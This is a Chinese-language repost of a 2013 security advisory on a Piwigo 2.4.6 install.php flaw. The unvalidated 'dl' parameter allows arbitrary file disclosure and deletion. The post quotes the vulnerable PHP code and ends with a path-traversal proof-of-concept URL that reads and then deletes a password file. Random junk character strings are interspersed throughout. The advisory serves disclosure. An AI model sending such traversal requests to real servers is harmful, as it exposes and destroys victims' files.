Piwigo任意文件泄露和任意文件删除漏洞

admin

Piwigo是用PHP编写的相册脚本。
: D1 y' K) z  ?# [% a# c
9 x9 K. G9 b+ n- N1 q  A" ^6 TPiwigo 2.4.6及其他版本没有正确验证install.php脚本的 'dl'参数值，在实现上存在安全漏洞，攻击者可利用这些漏洞查看受影响计算机上的任意文件，删除受影响应用上下文内的任意文件。
- s+ Z: O* s8 ~. `====================================================================
, V" Q% M( O/ G( v/ {4 z# o. J6 y  ~/install.php:
6 T; c! w0 R: k4 [: c5 g3 M* i-------------
113: if (!empty($_GET['dl']) && file_exists(PHPWG_ROOT_PATH.$conf['data_location'].'pwg_'.$_GET['dl']))
114: {
$ F9 T) J: u4 ^115:   $filename = PHPWG_ROOT_PATH.$conf['data_location'].'pwg_'.$_GET['dl'];
116:   header('Cache-Control: no-cache, must-revalidate');
117:   header('Pragma: no-cache');
( e  e' Z3 Y* o/ c$ N' {118:   header('Content-Disposition: attachment; filename="database.inc.php"');
119:   header('Content-Transfer-Encoding: binary');
* A0 Z) `) h9 n/ }5 X6 U120:   header('Content-Length: '.filesize($filename));
121:   echo file_get_contents($filename);
122:   unlink($filename);
% Q. `1 A. z' b  b% W$ s( H123:   exit();
6 O, c1 D3 m- v# _: L3 Y, r124: }
====================================================================
, x/ I9 q2 u( f3 l/ H) ^
4 Q3 |7 b+ V+ v8 N. l' f+ cTested on: Microsoft Windows 7 Ultimate SP1 (EN)
; U7 `# Q( w4 L           Apache 2.4.2 (Win32)
. N& n$ X1 j4 ^! H% ~3 v           PHP 5.4.4
           MySQL 5.5.25a

% J3 D! D0 S! H9 B, B. t3 J, E7 {2 ?Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
5 l0 C9 ~% C+ j. s* r& E( T' Y                            @zeroscience
0 g5 x1 @4 e0 t- Y1 F% d3 P
Advisory ID: ZSL-2013-5127
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2013-5127.php
Vendor Patch: http://piwigo.org/bugs/view.php?id=2843

15.02.2013

2 G) D5 ^5 d3 g+ @--
http://localhost/piwigo/install.php?dl=../../../../../../lio_passwords.txt
& q# M! Y1 I$ k4 o  S
4 d5 |4 v3 g' q8 ~$ @  m' D